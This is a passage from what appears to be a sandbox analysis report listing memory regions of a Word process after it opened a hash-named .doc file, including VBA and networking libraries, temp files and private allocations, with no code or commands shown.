entry_point = 0x753e2b71
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll")
Region:
id = 494
start_va = 0x4c0000
end_va = 0x4c0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004c0000"
filename = ""
Region:
id = 495
start_va = 0x75a80000
end_va = 0x75bb5fff
monitored = 0
entry_point = 0x75a81b35
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll")
Region:
id = 496
start_va = 0x76d80000
end_va = 0x76e74fff
monitored = 0
entry_point = 0x76d81865
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll")
Region:
id = 497
start_va = 0x75880000
end_va = 0x75a7afff
monitored = 0
entry_point = 0x758822d9
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll")
Region:
id = 498
start_va = 0x4c0000
end_va = 0x4c0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004c0000"
filename = ""
Region:
id = 499
start_va = 0x36b0000
end_va = 0x372ffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "ecd84fa8d836d5057149b2b3a048d75004ca1a1377fcf2f5e67374af3a1161a0.doc04ca1a1377fcf2f5e67374af3a1161a0doc"
filename = "\\Users\\kEecfMwgj\\Desktop\\ecd84fa8d836d5057149b2b3a048d75004ca1a1377fcf2f5e67374af3a1161a0.doc04ca1a1377fcf2f5e67374af3a1161a0doc" (normalized: "c:\\users\\keecfmwgj\\desktop\\ecd84fa8d836d5057149b2b3a048d75004ca1a1377fcf2f5e67374af3a1161a0.doc04ca1a1377fcf2f5e67374af3a1161a0doc")
Region:
id = 500
start_va = 0x3730000
end_va = 0x37affff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "~df0d10ef4bbf286424.tmp"
filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~DF0D10EF4BBF286424.TMP" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\~df0d10ef4bbf286424.tmp")
Region:
id = 501
start_va = 0x66920000
end_va = 0x66b9efff
monitored = 1
entry_point = 0x669bbfb8
region_type = mapped_file
name = "vbe7.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\vba\\vba7.1\\vbe7.dll")
Region:
id = 502
start_va = 0x666a0000
end_va = 0x6691efff
monitored = 1
entry_point = 0x6673bfb8
region_type = mapped_file
name = "vbe7.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\vba\\vba7.1\\vbe7.dll")
Region:
id = 503
start_va = 0x66920000
end_va = 0x66b9efff
monitored = 1
entry_point = 0x669bbfb8
region_type = mapped_file
name = "vbe7.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\vba\\vba7.1\\vbe7.dll")
Region:
id = 504
start_va = 0x666a0000
end_va = 0x6691efff
monitored = 1
entry_point = 0x6673bfb8
region_type = mapped_file
name = "vbe7.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\vba\\vba7.1\\vbe7.dll")
Region:
id = 505
start_va = 0x66920000
end_va = 0x66b9efff
monitored = 1
entry_point = 0x669bbfb8
region_type = mapped_file
name = "vbe7.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\vba\\vba7.1\\vbe7.dll")
Region:
id = 506
start_va = 0x75350000
end_va = 0x7540efff
monitored = 0
entry_point = 0x75361dfc
region_type = mapped_file
name = "msvcr100.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\SystemX86\\msvcr100.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\systemx86\\msvcr100.dll")
Region:
id = 507
start_va = 0x8cc0000
end_va = 0x8e6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008cc0000"
filename = ""
Region:
id = 508
start_va = 0x6f0000
end_va = 0x700fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_1251.nls"
filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls")
Region:
id = 509
start_va = 0x4d0000
end_va = 0x4d1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004d0000"
filename = ""
Region:
id = 510
start_va = 0xcf0000
end_va = 0xcf1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000cf0000"
filename = ""
Region:
id = 511
start_va = 0x66890000
end_va = 0x6691bfff
monitored = 0
entry_point = 0x66895382
region_type = mapped_file
name = "uiautomationcore.dll"
filename = "\\Windows\\SysWOW64\\UIAutomationCore.dll" (normalized: "c:\\windows\\syswow64\\uiautomationcore.dll")
Region:
id = 512
start_va = 0x74790000
end_va = 0x747cbfff
monitored = 0
entry_point = 0x74793089
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll")
Region:
id = 513
start_va = 0xd00000
end_va = 0xd00fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\SysWOW64\\oleaccrc.dll" (normalized: "c:\\windows\\syswow64\\oleaccrc.dll")
Region:
id = 514
start_va = 0x8e70000
end_va = 0x922ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e70000"
filename = ""
Region:
id = 515
start_va = 0xd10000
end_va = 0xd1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000d10000"
filename = ""
Region:
id = 516
start_va = 0xf10000
end_va = 0xf1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f10000"
filename = ""
Region:
id = 517
start_va = 0x77230000
end_va = 0x77232fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "normaliz.dll"
filename = "\\Windows\\SysWOW64\\normaliz.dll" (normalized: "c:\\windows\\syswow64\\normaliz.dll")
Region:
id = 518
start_va = 0x75340000
end_va = 0x75348fff
monitored = 0
entry_point = 0x7534153e
region_type = mapped_file
name = "linkinfo.dll"
filename = "\\Windows\\SysWOW64\\linkinfo.dll" (normalized: "c:\\windows\\syswow64\\linkinfo.dll")
Region:
id = 519
start_va = 0x66820000
end_va = 0x6688ffff
monitored = 0
entry_point = 0x66821f65
region_type = mapped_file
name = "ntshrui.dll"
filename = "\\Windows\\SysWOW64\\ntshrui.dll" (normalized: "c:\\windows\\syswow64\\ntshrui.dll")
Region:
id = 520
start_va = 0xd10000
end_va = 0xd10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000d10000"
filename = ""
Region:
id = 521
start_va = 0xd10000
end_va = 0xd10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000d10000"
filename = ""
Region:
id = 522
start_va = 0xd10000
end_va = 0xd10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000d10000"
filename = ""
Region:
id = 523
start_va = 0x75320000
end_va = 0x75338fff
monitored = 0
entry_point = 0x75321319
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll")
Region:
id = 524
start_va = 0xd10000
end_va = 0xd10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000d10000"
filename = ""
Region:
id = 525
start_va = 0x75310000
end_va = 0x7531afff
monitored = 0
entry_point = 0x75311200
region_type = mapped_file
name = "cscapi.dll"
filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll")
Region:
id = 526
start_va = 0x66800000
end_va = 0x66816fff
monitored = 0
entry_point = 0x668035fa
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")
Region:
id = 527
start_va = 0x667c0000
end_va = 0x667fcfff
monitored = 0
entry_point = 0x667c10f5
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")
Region:
id = 528
start_va = 0xf10000
end_va = 0xf10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000f10000"
filename = ""
Region:
id = 529
start_va = 0xf10000
end_va = 0xf10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000f10000"
filename = ""
Region:
id = 530
start_va = 0xf10000
end_va = 0xf10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000f10000"
filename = ""
Region:
id = 531
start_va = 0xf10000
end_va = 0xf10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000f10000"
filename = ""
Region:
id = 532
start_va = 0xf10000
end_va = 0xf10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000f10000"
filename = ""
Region:
id = 533
start_va = 0xf10000
end_va = 0xf10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000f10000"
filename = ""
Region:
id = 534
start_va = 0xf10000
end_va = 0xf10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000f10000"
filename = ""
Region:
id = 535
start_va = 0xf10000
end_va = 0xf10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000f10000"
filename = ""
Region:
id = 536
start_va = 0xf10000
end_va = 0xf10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000f10000"
filename = ""
Region:
id = 537
start_va = 0xf10000
end_va = 0xf10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000f10000"
filename = ""
Region:
id = 538
start_va = 0xf10000
end_va = 0xf10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000f10000"
filename = ""
Region:
id = 539
start_va = 0x6790000
end_va = 0x6890fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006790000"
filename = ""
Region:
id = 540
start_va = 0x6790000
end_va = 0x6890fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006790000"
filename = ""
Region:
id = 541
start_va = 0x6790000
end_va = 0x6890fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006790000"
filename = ""
Region:
id = 542
start_va = 0xf10000
end_va = 0xf10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000f10000"
filename = ""
Region:
id = 543
start_va = 0xf10000
end_va = 0xf10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000f10000"
filename = ""
Region:
id = 544
start_va = 0xf10000
end_va = 0xf10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000f10000"
filename = ""
Region:
id = 545
start_va = 0xf10000
end_va = 0xf10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000f10000"
filename = ""
Region:
id = 546
start_va = 0xf10000
end_va = 0xf10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000f10000"
filename = ""
Region:
id = 547
start_va = 0xf10000
end_va = 0xf10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000f10000"
filename = ""
Region:
id = 548
start_va = 0xf10000
end_va = 0xf10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000f10000"
filename = ""
Region:
id = 549
start_va = 0xf10000
end_va = 0xf10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000f10000"
filename = ""
Region:
id = 550
start_va = 0xf10000
end_va = 0xf10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000f10000"
filename = ""
Region:
id = 551
start_va = 0xf10000
end_va = 0xf10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000f10000"
filename = ""
Region:
id = 552
start_va = 0x6790000
end_va = 0x6890fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006790000"
filename = ""
Region:
id = 553
start_va = 0x6790000
end_va = 0x6890fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006790000"
filename = ""
Region:
id = 554
start_va = 0x72e00000
end_va = 0x72e5efff
monitored = 0
entry_point = 0x72e02134
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll")
Region:
id = 555
start_va = 0x3af0000
end_va = 0x3bd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msword.olb"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\MSWORD.OLB" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\msword.olb")
Region:
id = 556
start_va = 0x9230000
end_va = 0x9456fff
monitored = 1
entry_point = 0x923e058
region_type = mapped_file
name = "vbeui.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\vba\\vba7.1\\vbeui.dll")
Region:
id = 557
start_va = 0x9230000
end_va = 0x9456fff
monitored = 1
entry_point = 0x923e058
region_type = mapped_file
name = "vbeui.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\vba\\vba7.1\\vbeui.dll")
Region:
id = 558
start_va = 0x66580000
end_va = 0x667b0fff
monitored = 1
entry_point = 0x6658e058
region_type = mapped_file
name = "vbeui.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\vba\\vba7.1\\vbeui.dll")
Region:
id = 559
start_va = 0xf10000
end_va = 0xf12fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000f10000"
filename = ""
Region:
id = 560
start_va = 0xf20000
end_va = 0xf2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f20000"
filename = ""
Region:
id = 561
start_va = 0x66550000
end_va = 0x66575fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "vbe7intl.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\vba\\vba7.1\\1033\\vbe7intl.dll")
Region:
id = 562
start_va = 0xf30000
end_va = 0xf39fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "normnfd.nls"
filename = "\\Windows\\System32\\normnfd.nls" (normalized: "c:\\windows\\system32\\normnfd.nls")
Region:
id = 563
start_va = 0xf40000
end_va = 0xf40fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f40000"
filename = ""
Region:
id = 564
start_va = 0x9230000
end_va = 0x962ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000009230000"
filename = ""
Region:
id = 565
start_va = 0x4e90000
end_va = 0x4f0ffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "~wrf{8e4c4094-33c4-417c-a135-6578aaec0df2}.tmp"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRF{8E4C4094-33C4-417C-A135-6578AAEC0DF2}.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.word\\~wrf{8e4c4094-33c4-417c-a135-6578aaec0df2}.tmp")
Region:
id = 566
start_va = 0x31e0000
end_va = 0x31e0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000031e0000"
filename = ""
Region:
id = 567
start_va = 0x31f0000
end_va = 0x320ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000031f0000"
filename = ""
Region:
id = 568
start_va = 0x3210000
end_va = 0x3212fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003210000"
filename = ""
Region:
id = 569
start_va = 0x3220000
end_va = 0x3223fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003220000"
filename = ""
Region:
id = 570
start_va = 0x3230000
end_va = 0x3230fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003230000"
filename = ""
Region:
id = 571
start_va = 0x3240000
end_va = 0x3240fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003240000"
filename = ""
Region:
id = 572
start_va = 0x3580000
end_va = 0x3583fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003580000"
filename = ""
Region:
id = 573
start_va = 0x35f0000
end_va = 0x360ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000035f0000"
filename = ""
Region:
id = 574
start_va = 0x3610000
end_va = 0x3612fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003610000"
filename = ""
Region:
id = 575
start_va = 0x3640000
end_va = 0x3654fff
monitored = 1
entry_point = 0x36dbfb8
region_type = mapped_file
name = "vbe7.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\vba\\vba7.1\\vbe7.dll")
Region:
id = 576
start_va = 0x3620000
end_va = 0x3623fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "stdole2.tlb"
filename = "\\Windows\\SysWOW64\\stdole2.tlb" (normalized: "c:\\windows\\syswow64\\stdole2.tlb")
Region:
id = 577
start_va = 0x5d80000
end_va = 0x5dfbfff
monitored = 0
entry_point = 0x5d81000
region_type = mapped_file
name = "mso.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso.dll")
Region:
id = 578
start_va = 0x3660000
end_va = 0x3663fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003660000"
filename = ""
Region:
id = 579
start_va = 0x37b0000
end_va = 0x37b3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000037b0000"
filename = ""
Region:
id = 580
start_va = 0x37c0000
end_va = 0x37c3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000037c0000"
filename = ""
Region:
id = 581
start_va = 0x37d0000
end_va = 0x37effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000037d0000"
filename = ""
Region:
id = 582
start_va = 0x37f0000
end_va = 0x37f2fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000037f0000"
filename = ""
Region:
id = 583
start_va = 0x3800000
end_va = 0x3805fff
monitored = 1
entry_point = 0x389bfb8
region_type = mapped_file
name = "vbe7.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\vba\\vba7.1\\vbe7.dll")
Region:
id = 584
start_va = 0x3850000
end_va = 0x3853fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003850000"
filename = ""
Region:
id = 585
start_va = 0x3a60000
end_va = 0x3a9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003a60000"
filename = ""
Region:
id = 586
start_va = 0x8d50000
end_va = 0x8e4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008d50000"
filename = ""
Region:
id = 587
start_va = 0x8e60000
end_va = 0x8e6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e60000"
filename = ""
Region:
id = 588
start_va = 0x7ef6d000
end_va = 0x7ef6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef6d000"
filename = ""
Region:
id = 589
start_va = 0x3aa0000
end_va = 0x3aa3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003aa0000"
filename = ""
Region:
id = 590
start_va = 0x6790000
end_va = 0x688ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006790000"
filename = ""
Region:
id = 591
start_va = 0x8cc0000
end_va = 0x8d4dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008cc0000"
filename = ""
Region:
id = 592
start_va = 0x75300000
end_va = 0x75309fff
monitored = 0
entry_point = 0x75302a34
region_type = mapped_file
name = "wordcnvpxy.cnv"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\Wordcnvpxy.cnv" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\wordcnvpxy.cnv")
Region:
id = 593
start_va = 0x66540000
end_va = 0x66549fff
monitored = 0
entry_point = 0x66542a34
region_type = mapped_file
name = "wordcnvpxy.cnv"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\Wordcnvpxy.cnv" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\wordcnvpxy.cnv")
Region:
id = 594
start_va = 0x75300000
end_va = 0x7530bfff
monitored = 0
entry_point = 0x753028fd
region_type = mapped_file
name = "recovr32.cnv"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\TEXTCONV\\RECOVR32.CNV" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\textconv\\recovr32.cnv")
Region:
id = 595
start_va = 0x66530000
end_va = 0x6654ffff
monitored = 0
entry_point = 0x6653c7d4
region_type = mapped_file
name = "msconv97.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\TEXTCONV\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\textconv\\msconv97.dll")
Region:
id = 596
start_va = 0x66510000
end_va = 0x66541fff
monitored = 0
entry_point = 0x6652c742
region_type = mapped_file
name = "wpft532.cnv"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\TEXTCONV\\WPFT532.CNV" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\textconv\\wpft532.cnv")
Region:
id = 597
start_va = 0x664f0000
end_va = 0x6650ffff
monitored = 0
entry_point = 0x664fc7d4
region_type = mapped_file
name = "msconv97.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\TEXTCONV\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\textconv\\msconv97.dll")
Region:
id = 598
start_va = 0x66510000
end_va = 0x6654efff
monitored = 0
entry_point = 0x66534c50
region_type = mapped_file
name = "wpft632.cnv"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\TEXTCONV\\WPFT632.CNV" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\textconv\\wpft632.cnv")
Region:
id = 599
start_va = 0x664d0000
end_va = 0x664effff
monitored = 0
entry_point = 0x664dc7d4
region_type = mapped_file
name = "msconv97.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\TEXTCONV\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\textconv\\msconv97.dll")
Region:
id = 600
start_va = 0x4ab0000
end_va = 0x4b0bfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "shell32.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\shell32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\shell32.dll.mui")
Region:
id = 601
start_va = 0x3c20000
end_va = 0x3c20fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003c20000"
filename = ""
Region:
id = 602
start_va = 0x3c20000
end_va = 0x3c20fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003c20000"
filename = ""
Region:
id = 603
start_va = 0x3c20000
end_va = 0x3c20fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003c20000"
filename = ""
Region:
id = 604
start_va = 0x3c20000
end_va = 0x3c20fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003c20000"
filename = ""
Region:
id = 605
start_va = 0x3c20000
end_va = 0x3c20fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003c20000"
filename = ""
Region:
id = 606
start_va = 0x3c20000
end_va = 0x3c20fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003c20000"
filename = ""
Region:
id = 607
start_va = 0x3c20000
end_va = 0x3c20fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003c20000"
filename = ""
Region:
id = 608
start_va = 0x3c20000
end_va = 0x3c20fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003c20000"
filename = ""
Region:
id = 609
start_va = 0x3c20000
end_va = 0x3c20fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003c20000"
filename = ""
Region:
id = 610
start_va = 0x3c20000
end_va = 0x3c20fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003c20000"
filename = ""
Region:
id = 611
start_va = 0x9630000
end_va = 0x9730fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009630000"
filename = ""
Region:
id = 612
start_va = 0x9630000
end_va = 0x9730fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009630000"
filename = ""
Region:
id = 613
start_va = 0x9630000
end_va = 0x9730fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009630000"
filename = ""
Region:
id = 614
start_va = 0x3c20000
end_va = 0x3c23fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mlang.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\mlang.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mlang.dll.mui")
Region:
id = 615
start_va = 0x9630000
end_va = 0x9a2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000009630000"
filename = ""
Region:
id = 616
start_va = 0x66d0000
end_va = 0x674ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000066d0000"
filename = ""
Region:
id = 617
start_va = 0x3c30000
end_va = 0x3c30fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003c30000"
filename = ""
Region:
id = 618
start_va = 0x3c30000
end_va = 0x3c30fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003c30000"
filename = ""
Region:
id = 619
start_va = 0x3c30000
end_va = 0x3c30fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003c30000"
filename = ""
Region:
id = 620
start_va = 0x3c30000
end_va = 0x3c30fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003c30000"
filename = ""
Region:
